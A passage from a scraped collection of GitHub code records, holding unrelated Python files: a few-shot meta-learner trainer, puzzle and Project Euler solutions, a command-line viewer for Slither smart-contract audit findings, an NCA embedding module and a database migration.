'\n 'Now you won\\'t be notified about this user'\n )\n","repo_name":"nzinov/depressionweakerthan.tech","sub_path":"backend/bot/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":23871,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"14775029445","text":"from dataset import FewShotDataset \nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom tqdm.notebook import tqdm\nimport copy\nfrom scipy import stats\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass MetaLearnerHelper():\n ''' Class to perform training and validation of the meta learner\n - model_learner (Learner): the Learner() model\n - model_meta (MetaLearner): the MetaLearner() model\n - k_shot (int): what k shot value to use\n - criterion (nn.loss): which loss function to use\n NOTE: majority of the code is my own code. I was aided in some areas by an implementation at \n https://github.com/markdtw/meta-learning-lstm-pytorch/ to help structure the training functions.\n There are inherit similarities with this implementation and others since there are only so many\n ways to do the same thing.\n '''\n def __init__(self, model_learner, model_meta, k_shot, criterion=nn.NLLLoss(reduction='mean')):\n self.model_learner = model_learner.to(device)\n self.model_learner_outer = copy.deepcopy(self.model_learner)\n self.model_meta = model_meta.to(device)\n self.num_params = self.model_meta.num_params\n self.criterion = criterion\n self.k_shot = k_shot\n\n assert self.k_shot == 5 or self.k_shot == 1\n\n # create training datasets\n train_dataset = FewShotDataset(self.k_shot, 'train')\n val_dataset = FewShotDataset(self.k_shot, 'val')\n test_dataset = FewShotDataset(self.k_shot, 'test')\n\n self.train_data_loader = torch.utils.data.DataLoader(train_dataset, batch_size=1, shuffle=False)\n self.val_data_loader = torch.utils.data.DataLoader(val_dataset, batch_size=1, shuffle=False)\n self.test_data_loader = torch.utils.data.DataLoader(test_dataset, batch_size=1, shuffle=False)\n\n self.num_inner_epochs = 5 if self.k_shot == 5 else 12\n\n def get_grads(self):\n ''' Get the parameters for the model in one flattened tensor\n '''\n return torch.cat([p.grad.view(-1) for p in self.model_learner.parameters()])\n\n def erase_batch_stats(self):\n ''' Erase the batch statistics of the learner model. 
The paper suggests\n we do this on every new dataset D\n '''\n batch_norms = [nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d]\n for module in self.model_learner.modules():\n if isinstance(module, tuple(batch_norms)):\n module.reset_running_stats()\n for module in self.model_learner_outer.modules():\n if isinstance(module, tuple(batch_norms)):\n module.reset_running_stats()\n\n def update_model_params(self, new_params):\n ''' Copies the params from new_params into the model params to update them\n - new_params (torch.Tensor): tensor of the flattened params for model\n '''\n i = 0\n for param in self.model_learner.parameters():\n j = i + param.numel()\n param.data.copy_(new_params[i:j].reshape(param.shape))\n i = j\n \n def _calc_conf_inter(self, all_acc):\n ''' Calculate the 95% confidence interval for the accuracy data\n all_acc (list): list of accuracies\n returns mean (float), size of the conf interval (float)\n '''\n sample_mean = np.mean(all_acc)\n sample_std = np.std(all_acc)\n sem = sample_std / np.sqrt(len(all_acc))\n ci = stats.t.interval(0.95, len(all_acc) - 1, loc=sample_mean, scale=sem)\n ci_size = (ci[1] - ci[0]) / 2 \n return sample_mean, ci_size\n\n def train_inner_learner(self, train_data):\n ''' Train the learner using updates from the meta learner\n - train_data (tuple): contains train images and labels\n '''\n hs_lstm = None\n hs_meta_lstm = {'i': torch.zeros((self.num_params, self.model_meta.meta_lstm.hidden_size)).to(device),\n 'f': torch.zeros((self.num_params, self.model_meta.meta_lstm.hidden_size)).to(device),\n 'theta': self.model_meta.meta_lstm.theta}\n train_images, _, train_labels, _ = train_data\n\n train_images = train_images.squeeze().to(device)\n train_labels = train_labels.squeeze().to(device)\n training_losses = []\n\n # train learner for self.num_inner_epochs\n for epoch in range(self.num_inner_epochs): \n # get new theta values from meta learner\n self.update_model_params(hs_meta_lstm['theta'])\n \n self.model_learner.zero_grad()\n\n out = self.model_learner(train_images)\n loss = self.criterion(out, train_labels)\n training_losses.append(loss.item())\n\n loss.backward()\n\n # get gradients of each param and use meta LSTM to update params\n flattened_grads = self.get_grads()\n hs_lstm, hs_meta_lstm = self.model_meta(flattened_grads, loss, hs_lstm, hs_meta_lstm)\n\n return hs_meta_lstm['theta']\n \n def train_meta_learner(self, num_epochs, model_path, grad_clip=0.25):\n ''' Train the entire meta learner.\n - num_epochs (int): number of epochs to train entire model for\n - grad_clip (float): gradient clipping value to use\n '''\n # use values from hyperparam tuning\n max_lr = 6.9e-4 if self.k_shot == 5 else 1.2e-3\n\n optimizer = torch.optim.Adam(self.model_meta.parameters(), lr=max_lr)\n\n # create cyclic learning rate with value found from tuning\n # step size is approx 5 times num iterations in one epoch\n lr_scheduler = torch.optim.lr_scheduler.CyclicLR(optimizer, base_lr=max_lr/4, \n max_lr=max_lr, step_size_up=2000,\n mode='triangular2', cycle_momentum=False)\n\n running_acc, running_loss, running_count = 0.0, 0.0, 0\n all_loss = []\n all_val_loss = []\n loss_every = 100\n\n pbar = tqdm(range(num_epochs),\n desc=\"training\", position=1)\n \n best_val_acc = 0\n \n idx = 0\n for epoch in pbar:\n # create a new dataset every iteration\n self.train_data_loader.dataset.shuffle_datasets()\n for train_data in self.train_data_loader:\n _, test_images, _, test_labels = train_data\n test_images = test_images.squeeze().to(device)\n test_labels = 
test_labels.squeeze().to(device)\n optimizer.zero_grad()\n self.erase_batch_stats()\n self.model_learner.train()\n self.model_learner_outer.train()\n\n theta = self.train_inner_learner(train_data)\n\n # transfer learned parameters to seperate learner model for loss calc\n self.model_learner_outer.transfer_params(self.model_learner, theta)\n test_output = self.model_learner_outer(test_images)\n loss = self.criterion(test_output, test_labels)\n\n pred_test_labels = torch.argmax(test_output, dim=1)\n correct = (pred_test_labels == test_labels).sum().item()\n acc = correct / test_labels.shape[0]\n\n running_loss += loss.item()\n running_acc += acc\n running_count += 1\n\n # calculate the meta learner gradients and update the grads accordingly\n meta_grads = torch.autograd.grad(loss, self.model_meta.parameters())\n for i, param in enumerate(self.model_meta.parameters()):\n param.grad = meta_grads[i]\n\n # Clip the gradients\n nn.utils.clip_grad_norm_(self.model_meta.parameters(), grad_clip)\n\n optimizer.step()\n lr_scheduler.step()\n\n pbar.set_description(f'''epoch: {epoch} loss: {running_loss/running_count:.3f} \n acc: {running_acc/running_count*100:.2f}''')\n \n if idx % loss_every == loss_every - 1:\n running_loss /= running_count\n all_loss.append(running_loss)\n print(f'epoch: {epoch:3d} iter: {idx} loss: {running_loss:6.4f} acc: {running_acc/running_count*100:5.2f}%')\n running_acc, running_loss, running_count = 0.0, 0.0, 0\n idx += 1\n \n ################################\n # validation after every epoch #\n ################################\n val_loss, val_acc = self.valid_meta_learner(is_valid=True, use_pbar=False)\n all_val_loss.append(val_loss)\n print(f'VALIDATION iter: {idx} loss: {val_loss:6.4f} acc: {val_acc[0]*100:5.2f}%')\n \n # save best model\n if val_acc[0] > best_val_acc:\n best_val_acc = val_acc[0]\n torch.save({\n 'model_meta_state_dict': self.model_meta.state_dict(),\n 'model_learner_state_dict': self.model_learner.state_dict(),\n 'model_learner_outer_state_dict': self.model_learner_outer.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'iter': idx,\n 'epoch': epoch,\n 'acc': val_acc,\n 'all_loss': all_loss,\n 'valid_loss': all_val_loss\n }, f'{model_path}')\n \n def valid_meta_learner(self, is_valid, use_pbar=False):\n ''' Perform validation or testing on the meta learner\n - is_valid (bool): true if validation, false if testing set\n - use_pbar (bool): whether or not to display a progress bar\n '''\n name = 'valid' if is_valid else 'test'\n data_loader = self.val_data_loader if is_valid else self.test_data_loader\n\n running_acc, running_loss, running_count = 0.0, 0.0, 0\n all_acc = []\n loss_every = 100\n\n if use_pbar:\n pbar = tqdm(data_loader,\n desc=name, position=1)\n else:\n pbar = data_loader\n\n # loop through all the images\n for idx, data in enumerate(pbar):\n _, test_images, _, test_labels = data\n test_images = test_images.squeeze().to(device)\n test_labels = test_labels.squeeze().to(device)\n\n self.erase_batch_stats()\n self.model_meta.eval()\n self.model_learner.train()\n\n # train inner learner and get theta values\n theta = self.train_inner_learner(data)\n \n # update the model params and get output\n self.update_model_params(theta)\n test_output = self.model_learner(test_images)\n loss = self.criterion(test_output, test_labels)\n\n # get predictions\n pred_test_labels = torch.argmax(test_output, dim=1)\n correct = (pred_test_labels == test_labels).sum().item()\n acc = correct / test_labels.shape[0]\n all_acc.append(acc)\n\n 
running_loss += loss.item()\n running_acc += acc\n running_count += 1\n\n if use_pbar:\n pbar.set_description(f'''{name} loss: {running_loss/running_count:.3f} \n acc: {running_acc/running_count*100:.2f}''')\n # get confidence interval\n conf_int = self._calc_conf_inter(all_acc) \n \n return running_loss / running_count, conf_int\n","repo_name":"alexrog/few-shot-learning","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":10480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24800301772","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\n\ndef topology_sort():\n\n q = deque()\n\n for i in range(1, n + 1):\n if indegree[i] == 0:\n q.append(i)\n\n while q:\n\n x = q.popleft()\n\n for nx in graph[x]:\n\n indegree[nx] -= 1\n res[nx] = max(res[nx], d[nx-1]+res[x])\n\n if indegree[nx] == 0:\n q.append(nx)\n\n\nt = int(input())\n\nfor _ in range(t):\n\n n, k = map(int, input().split())\n d = list(map(int, input().split()))\n indegree = [0] * (n + 1)\n graph = [[] for _ in range(n + 1)]\n res = [0] * (n + 1)\n\n for _ in range(k):\n\n a, b = map(int, input().split())\n graph[a].append(b)\n indegree[b] += 1\n\n for i in range(1, n + 1):\n res[i] = d[i-1]\n\n topology_sort()\n\n w = int(input())\n\n print(res[w])\n","repo_name":"JUNGJUNSEO/baekjun","sub_path":"백준/1005_ACM Craft_221222.py","file_name":"1005_ACM Craft_221222.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11547685807","text":"#!/usr/local/bin/python3\n'''\nProblem 10 : Summation of primes\nThe sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\nFind the sum of all the primes below two million.\nhttps://projecteuler.net/problem=10\n---\n프로그래머 Programmer : 제이스 Jace (https://jacealan.github.io)\n사용언어 Language : 파이썬 Python 3.6.4\nOS : macOS High Sierra 10.13.3\n에디터 Editor : Visual Studio Code\n'''\n\n\ndef is_prime(x, known_prime):\n '''솟수 여부 확인\n\n 솟수이면 True\n 솟수가 아니면 False'''\n if x == 2:\n return True\n for i in known_prime:\n if x % i == 0:\n return False\n return True\n\n\ndef solution1():\n '''솟수의 합'''\n\n limit = 2000000\n primes = []\n for num in range(2, limit + 1):\n if num in primes:\n continue\n if is_prime(num, primes):\n primes.append(num)\n print(sum(primes))\n\n\ndef solution2():\n '''솟수의 합'''\n\n limit = 100000\n numbers = list(range(2, limit + 1))\n primes = []\n num = numbers[0]\n while True:\n if is_prime(num, primes):\n for i in numbers[:]:\n if i % num == 0:\n numbers.remove(i)\n primes.append(num)\n # print(sum(primes), primes)\n print(len(numbers))\n\n if len(numbers) == 0:\n break\n num = numbers[0]\n print(sum(primes))\n\n\ndef solution3():\n '''솟수의 합'''\n\n limit = 100000\n nums = list(range(2, limit + 1))\n primes = []\n num = nums[0]\n while num < limit + 1:\n if is_prime(num, primes):\n nums = sorted(\n list(set(nums) - set(list(range(num, limit + 1, num)))))\n primes.append(num)\n # print(nums)\n if len(nums) == 0:\n break\n num = nums[0]\n # print()\n print(sum(primes))\n\n\nif __name__ == '__main__':\n solution1()\n # solution2()\n # solution3()\n","repo_name":"jacealan/eulernet","sub_path":"level1/10-Summation of primes.py","file_name":"10-Summation of primes.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"75405551687","text":"import argparse\nimport json\nfrom 
collections import defaultdict\nfrom cmd import Cmd\n\n\nclass FindingsCLI(Cmd):\n def __init__(self, findings_by_impact):\n super(FindingsCLI, self).__init__()\n self.prompt = \"∴ \"\n self.findings_by_impact = findings_by_impact\n\n def do_count(self, _):\n \"\"\"List number of findings by impact.\"\"\"\n self.count_findings(self.findings_by_impact)\n print()\n\n def do_list(self, impact):\n \"\"\"List findings with a specific impact level.\n Usage: impact [high|medium|low|informational|optimization]\n \"\"\"\n if impact == None or impact not in self.findings_by_impact.keys():\n print(\"Please provide a valid impact level.\")\n return\n self.print_findings(impact.lower(), self.findings_by_impact)\n print()\n\n def do_detail(self, args):\n \"\"\"Display the full details of a specific finding by its number in the impact list.\n Usage: detail [impact] [number]\n \"\"\"\n if args.count(\" \") != 1:\n print(\"Please provide impact and a valid finding number.\")\n else:\n impact, number = args.lower().split()\n if impact not in self.findings_by_impact.keys():\n print(\"Please provide a valid impact level.\")\n return\n try:\n index = int(number) - 1\n finding = self.findings_by_impact[impact][index]\n display_finding(finding)\n except (IndexError, ValueError):\n print(\"Please provide a valid finding number.\")\n print()\n\n def do_exit(self, _):\n \"\"\"Exit the Findings CLI.\"\"\"\n print(\"Exiting...\")\n return True\n\n def do_EOF(self, _):\n \"\"\"Exit the Findings CLI using Ctrl-D.\"\"\"\n print(\"Exiting...\")\n return True\n\n def print_findings(self, impact, findings_by_impact):\n (\"--------------------\")\n print(f\"Finding Impact: {impact}\")\n print(f\"Number of Findings: {len(findings_by_impact[impact])}\")\n\n counter = 0\n\n for f in findings_by_impact[impact]:\n counter += 1\n print(f\"{counter}. 
{f['check']}\")\n print(f[\"description\"])\n # print reference: Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#reentrancy-vulnerabilities-2\n\n def count_findings(self, findings_by_impact):\n print(\"# of Findings by Impact\")\n # Determine the length of the longest impact string\n longest_impact_length = max(len(impact) for impact in findings_by_impact.keys())\n # Print findings\n for impact in findings_by_impact.keys():\n print(\n f\" {impact.capitalize():{longest_impact_length}} {len(findings_by_impact[impact])}\"\n )\n\n def do_sum(self, impact):\n \"\"\"Summarize the number of findings with the specified impact grouped by check type.\n Usage: summarize [high|medium|low|informational|optimization]\n \"\"\"\n if impact not in self.findings_by_impact.keys():\n print(\"Please provide a valid impact level.\")\n return\n self.summarize_findings_by_check(impact, self.findings_by_impact)\n print()\n\n def summarize_findings_by_check(self, impact, findings_by_impact):\n # print(f\"Summary of Findings for Impact Level: {impact}\")\n summary = defaultdict(int)\n for finding in findings_by_impact[impact]:\n summary[finding[\"check\"]] += 1\n\n for check, count in summary.items():\n print(f\"{check:<25} {count}\")\n\n\ndef parse_report(filename, impact_filter=None):\n with open(filename, \"r\") as file:\n json_data = file.read()\n\n data = json.loads(json_data)\n\n # sort findings by impact\n findings = defaultdict(list)\n for detector in data[\"results\"][\"detectors\"]:\n if impact_filter:\n if detector[\"impact\"].lower() not in impact_filter.lower().split(\",\"):\n continue\n findings[detector[\"impact\"].lower()].append(detector)\n\n return findings\n\n\ndef display_finding(finding):\n print(f\"Finding ID: {finding['id']}\")\n print(f\"Finding Impact: {finding['impact']}\")\n print(f\"Finding Confidence: {finding['confidence']}\")\n print(f\"Finding Description: {finding['description']}\")\n print(f\"Finding Check: {finding['check']}\")\n print(f\"Finding Markdown: {finding['markdown']}\")\n print(f\"Finding First Markdown Element: {finding['first_markdown_element']}\")\n print(f\"Finding Elements: {finding['elements']}\")\n\n\ndef print_instructions(args):\n print(\n \"\"\" _______ _ __________________ _______ _______\n( ____ \\\\( \\\\ \\\\__ __/\\\\__ __/|\\\\ /|( ____ \\\\( ____ )\n| ( \\\\/| ( ) ( ) ( | ) ( || ( \\\\/| ( )|\n| | | | | | | | | (___) || (__ | (____)|\n| | | | | | | | | ___ || __) | __)\n| | | | | | | | | ( ) || ( | (\\\\ (\n| (____/\\\\| (____/\\\\___) (___ | | | ) ( || (____/\\\\| ) \\\\ \\\\__\n(_______/(_______/\\\\_______/ )_( |/ \\\\|(_______/|/ \\\\__/\n \"\"\"\n )\n print(f\"Loaded Slither Output: {args.filename}\\n\")\n print(\"Available Commands:\")\n print(f\" - {'count':<25} list finding summary\")\n print(f\" - {'sum [impact]':<25} summarize findings by detector\")\n print(\n f\" - {'list [impact]':<25} list findings by impact [high|medium|low|informational|optimization]\"\n )\n print(f\" - {'detail [impact] [number]':<25} display full findings details\")\n print(\n \"\\nVulnerability / Remediation Info: https://github.com/crytic/slither/wiki/Detector-Documentation\"\n )\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"filename\", help=\"JSON filename\")\n parser.add_argument(\"-i\", \"--impact\", help=\"impact level filter (comma-separated)\")\n args = parser.parse_args()\n\n findings_by_impact = parse_report(args.filename, args.impact)\n\n # Run the CLI\n print_instructions(args)\n 
FindingsCLI(findings_by_impact).cmdloop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ARPA-Network/BLS-TSS-Network","sub_path":"contracts/slither/clither.py","file_name":"clither.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"15387249425","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nblocks = int(input())\nvalues = []\nfor i in range(blocks):\n length = int(input())\n value = list(map(int, input().split()))\n values.append((length, value))\n\nfor length, value in values:\n left, right = 0, length - 1\n valid = \"Yes\"\n prev = float('inf')\n while left < right:\n if value[left] >= value[right] and value[left] <= prev:\n prev = value[left]\n left += 1\n elif value[right] >= value[left] and value[right] <= prev:\n prev = value[right]\n right -= 1\n else:\n valid = \"No\"\n break\n print(valid)\n \n","repo_name":"birehan/Competitive-Programming","sub_path":"Piling Up!/Piling Up!.py","file_name":"Piling Up!.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"36262980782","text":"\nfrom db_service import get_item\nfrom request_response_utils import return_error_response, return_status_ok\n\nENV_TABLE_NAME = \"dermoapp-patient-cases\"\n\n\ndef handler(event, context):\n try:\n print(\"lambda execution with contexts {0}\".format(str(context)))\n response = get_item()\n return return_status_ok(response)\n except Exception as err:\n return return_error_response(\"cannot proceed with the request error: \" + str(err), 500)\n","repo_name":"Miso-grupo10-dermoapp/miso-grupo10-doctor-cases-query","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"520063086","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.neighbors import NeighborhoodComponentsAnalysis\nimport lib.lossfunction.metric as metric\n\n\nclass NCA(nn.Module):\n\n def __init__(self, input_dim, output_dim=2, init_method=\"random\", max_batch_size=128, scale=1, device=\"cpu\", distance_method=\"euclidean\"):\n super(NCA, self).__init__()\n self.init_method = init_method\n self.scale = float(scale)\n\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.device = torch.device(device)\n self.distance_method = distance_method\n\n if distance_method not in (\"euclidean\", ):\n raise NotImplementedError\n\n self._init_transformation()\n self._init_indices(max_batch_size=max_batch_size)\n\n def _init_indices(self, max_batch_size):\n self.batch_sample_index = []\n# max_batch_size = max_batch_size * 2\n for b_id in range(max_batch_size):\n sample_index = torch.arange(max_batch_size, device=self.device)\n sample_index = torch.cat(\n (sample_index[:b_id], sample_index[b_id+1:]))\n self.batch_sample_index.append(sample_index)\n self.batch_sample_index = torch.stack(self.batch_sample_index)\n\n def _init_transformation(self):\n \"\"\"Initialize the linear transformation A.\n \"\"\"\n if self.input_dim is None:\n self.input_dim = self.output_dim\n if self.init_method == \"random\":\n # print('using random init')\n a = torch.randn(self.input_dim, self.output_dim,\n device=self.device) / np.sqrt(self.input_dim)\n self.A = torch.nn.Parameter(a)\n elif self.init_method == \"identity\":\n a = torch.eye(self.input_dim, 
self.output_dim, device=self.device)\n self.A = torch.nn.Parameter(a)\n\n elif self.init_method == \"pca\":\n self.A = None\n\n else:\n raise ValueError(\n \"[!] {} initialization is not supported.\".format(self.init))\n\n def _pca(self, x):\n torch.svd(x)\n\n def forward(self, x, y, check=False):\n this_batch_size = x.shape[0]\n\n if self.A is None and self.init_method == \"pca\":\n self._pca()\n\n transformed_x = torch.mm(x, self.A)\n# print(transformed_x)\n\n if self.distance_method == \"euclidean\":\n logits_mat = metric.calc_l2_dist_torch(\n feature1=transformed_x,\n feature2=transformed_x,\n dim=1,\n is_sqrt=False,\n is_neg=True\n )\n\n else:\n raise NotImplementedError\n\n sample_indices = self.batch_sample_index[:\n this_batch_size][:, :this_batch_size-1]\n\n # print(logits_mat.shape, transformed_x.shape)\n # print(sample_indices)\n logits_mat = torch.gather(\n logits_mat, dim=1, index=sample_indices) * self.scale\n # print(logits_mat.shape)\n\n\n# logits_mat_exp = logits_mat.exp()\n# prob = logits_mat_exp / torch.sum(logits_mat_exp, dim=1, keepdim=True)\n\n# print(prob)\n logits_mat_stable = logits_mat - \\\n torch.max(logits_mat, dim=1, keepdim=True)[0]\n logits_mat_exp = logits_mat_stable.exp()\n p_ij = logits_mat_exp / torch.sum(logits_mat_exp, dim=1, keepdim=True)\n\n y_mask = y[:, None] == y[None, :]\n y_mask = torch.gather(\n y_mask,\n dim=1,\n index=sample_indices\n )\n# print(y_mask)\n# print(p_ij)\n p_ij_mask = p_ij * y_mask.float()\n p_i = p_ij_mask.sum(dim=1)\n\n# print(p_i)\n p_i = p_i.clamp(min=1e-5, max=1-1e-5)\n classification_loss = - torch.log(p_i).mean()\n\n return classification_loss, transformed_x\n\n def transform(self, x):\n return torch.mm(x, self.A)\n\n\nclass NCATrainer:\n\n def __init__(self, input_dim, output_dim=2, is_instanciate_each_iter=True, init_method=\"random\", max_batch_size=128, scale=1., device=\"cpu\", distance_method=\"euclidean\"):\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.is_instanciate_each_iter = is_instanciate_each_iter\n\n if not is_instanciate_each_iter:\n self.nca = NCA(\n input_dim=input_dim,\n output_dim=output_dim,\n init_method=init_method,\n max_batch_size=max_batch_size,\n scale=scale,\n device=device,\n distance_method=distance_method\n )\n\n self.base_nca_state_dict = None\n\n def register_nca_state_dict(self, base_nca_state_dict):\n self.base_nca_state_dict = base_nca_state_dict\n\n def __call__(self, support_vector, query_vector, query_label, init_method=\"random\", max_batch_size=128, distance_method=\"euclidean\", lr=0.01, max_iter=50, stop_diff=1e-4, scale=1., get_feats=False, stop_criteria=\"l1norm\"):\n \"\"\"\n support_vectors: torch.Tensor, (num_class, num_support, D)\n query_vectors: torch.Tensor, (num_class*num_query, D)\n \"\"\"\n\n if self.is_instanciate_each_iter:\n num_class, num_support, D = support_vector.shape\n # support_vector = support_vector.cuda()\n\n if \"cuda\" not in str(support_vector.device):\n # support_vector = support_vector.cuda()\n # query_vector = query_vector.cuda()\n\n # if query_label is not None:\n # query_label = query_label.cuda()\n\n # turn_to_cpu = True\n turn_to_cpu = False\n\n else:\n turn_to_cpu = False\n\n label_for_support = torch.arange(num_class, device=support_vector.device).reshape(-1, 1)\n label_for_support = label_for_support.repeat(\n 1, num_support).reshape(-1)\n\n support_vector = support_vector.reshape(-1, D)\n # print(support_vector.device)\n\n nca = NCA(\n input_dim=self.input_dim,\n output_dim=self.output_dim,\n init_method=init_method,\n 
max_batch_size=max_batch_size,\n scale=scale,\n device=support_vector.device,\n distance_method=distance_method\n )\n\n if self.base_nca_state_dict is not None:\n nca.load_state_dict(self.base_nca_state_dict)\n\n first_data = nca.A.data\n for i in range(max_iter):\n loss, _ = nca(support_vector, label_for_support, check=True)\n gradients = torch.autograd.grad(\n loss, nca.A, create_graph=True)[0]\n\n prev_nca_A = nca.A.data\n\n nca.A.data = nca.A - gradients * lr\n diff = torch.abs(prev_nca_A - nca.A.data)\n \n if stop_criteria == \"l1norm\":\n diff = diff.sum()\n elif stop_criteria == \"l2norm\":\n diff = (diff * diff).sum().sqrt()\n else:\n raise NotImplementedError(stop_criteria)\n # print(\"{} th iter diff: {}, loss={}\".format(i, diff, loss))\n\n if diff <= stop_diff:\n break\n # final_diff = torch.abs(nca.A.data - first_data)\n # final_diff = (final_diff * final_diff).sum().sqrt()\n # print(\"final diff:\", final_diff, \"max iter={}\".format(max_iter))\n\n # with torch.no_grad():\n num_query = query_vector.shape[0]\n concated_vector = torch.cat((support_vector, query_vector), axis=0)\n transformed_logit = nca.transform(\n x=concated_vector\n )\n transformed_support = transformed_logit[:-num_query]\n transformed_query = transformed_logit[-num_query:]\n NB, D2 = transformed_query.shape\n\n transformed_support = transformed_support.reshape(num_class, num_support, D2)\n transformed_support_mean_feats = transformed_support.mean(dim=1)\n\n # print(transformed_query.shape)\n # print(transformed_support_mean_feats.shape)\n\n if distance_method == \"euclidean\":\n transformed_logit = metric.calc_l2_dist_torch(\n transformed_query, transformed_support_mean_feats, dim=1\n )\n else:\n raise NotImplementedError\n\n if turn_to_cpu:\n transformed_logit = transformed_logit.cpu()\n transformed_query = transformed_query.cpu()\n transformed_support = transformed_support.cpu()\n # transformed_logit = torch.mm(transformed_query, transformed_support_mean_feats.permute(1, 0))\n\n else:\n if get_feats:\n loss = 0\n num_class, num_support, D = support_vector.shape\n support_vector = support_vector.reshape(-1, D)\n\n num_query = query_vector.shape[0]\n concated_vector = torch.cat((support_vector, query_vector), axis=0)\n transformed_logit = self.nca.transform(\n x=concated_vector\n )\n transformed_support = transformed_logit[:-num_query]\n transformed_query = transformed_logit[-num_query:]\n NB, D2 = transformed_query.shape\n\n transformed_support = transformed_support.reshape(num_class, num_support, D2)\n transformed_support_mean_feats = transformed_support.mean(dim=1)\n\n # print(transformed_query.shape)\n # print(transformed_support_mean_feats.shape)\n\n if distance_method == \"euclidean\":\n transformed_logit = metric.calc_l2_dist_torch(\n transformed_query, transformed_support_mean_feats, dim=1\n )\n else:\n raise NotImplementedError\n\n else:\n assert len(query_vector.shape) == 2, query_vector.shape\n assert len(query_label.shape) == 1, query_label.shape\n loss, transformed_logit = self.nca(\n query_vector, query_label, check=True)\n\n if get_feats:\n return loss, transformed_logit, transformed_support, transformed_query\n\n else:\n return loss, transformed_logit\n\n\ndef fit_nca_with_sklearn(features, labels, args):\n nca = NeighborhoodComponentsAnalysis(\n max_iter=args.MODEL.nca_max_iter, \n tol=args.MODEL.nca_stop_diff, \n n_components=args.MODEL.embedding_n_components,\n init=\"pca\",\n verbose=1\n )\n\n nca.fit(\n X=features,\n y=labels\n )\n\n device = args.MODEL.trn_embedder.nca.A.device\n dtype 
= args.MODEL.trn_embedder.nca.A.dtype\n\n components = nca.components_.T\n components = torch.from_numpy(components.astype(np.float32)).type(dtype).to(device)\n\n args.MODEL.trn_embedder.nca.A.data = components\n args.MODEL.val_embedder.nca.A.data = components\n","repo_name":"min9813/self_supervise","sub_path":"src/lib/embeddings/nca.py","file_name":"nca.py","file_ext":"py","file_size_in_byte":11105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42429461651","text":"\"\"\"medications table\n\nRevision ID: 3d6bdf850d10\nRevises: 7b7fc337ef13\nCreate Date: 2023-04-02 02:06:29.945399\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '3d6bdf850d10'\ndown_revision = '7b7fc337ef13'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('medications',\n sa.Column('id', sa.Text(length=36), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=False),\n sa.Column('weight', sa.Integer(), nullable=False),\n sa.Column('code', sa.String(length=64), nullable=False),\n sa.Column('image', sa.String(length=256), nullable=True),\n sa.Column('created', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n with op.batch_alter_table('medications', schema=None) as batch_op:\n batch_op.create_index(batch_op.f('ix_medications_code'), ['code'], unique=True)\n batch_op.create_index(batch_op.f('ix_medications_name'), ['name'], unique=True)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('medications', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_medications_name'))\n batch_op.drop_index(batch_op.f('ix_medications_code'))\n\n op.drop_table('medications')\n # ### end Alembic commands ###\n","repo_name":"rmoscuba/drone_dispatcher","sub_path":"drones_dispatcher/migrations/versions/3d6bdf850d10_medications_table.py","file_name":"3d6bdf850d10_medications_table.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72431334089","text":"# Placeholder for input parameters\n# Options: Apportionment, Allocation\nprob_type = 'apportionment' # NOTE: unused\n# If apportionment, this is the maximum total that can be purchased\n# If allocation, this is the total number of machines available to be allocated\n\n\ntime_delta = 0.5 # NOTE: unused - time increment in minutes\n\n\n# Defining objective\n# Current state: only 'Max', future state to include 'Quantile' and 'Average'\nObjective = 'Max' # NOTE: unused\n# Not used in MVP\n# ObjectiveQuantileValue = 0.95\n# Waiting time <= how many minutes\nmu0Value = 500 # NOTE unused\n\n# Arrival time periods\n# not currently used\n# TotalNoOfPeriods = 4\n\n\n# Only single resource has been built\nNumberOfResources = 1 # NOTE: unused\n\n\n# Create results arrays\navgResources = np.zeros(NUM_LOCATIONS) # NOTE: unused\navgWaitingTime = np.zeros(NUM_LOCATIONS) # NOTE: unused\nMaxWaitingTime = np.zeros(NUM_LOCATIONS) # NOTE: unused\nQuantWaitingTime = np.zeros(NUM_LOCATIONS) # NOTE: unused\nWaitProbabilities = np.zeros(NUM_LOCATIONS) # NOTE: unused\nMeanClosingTimes = np.zeros(NUM_LOCATIONS) # NOTE: unused\n\n\n# Iterate over locations\nloc_sol = 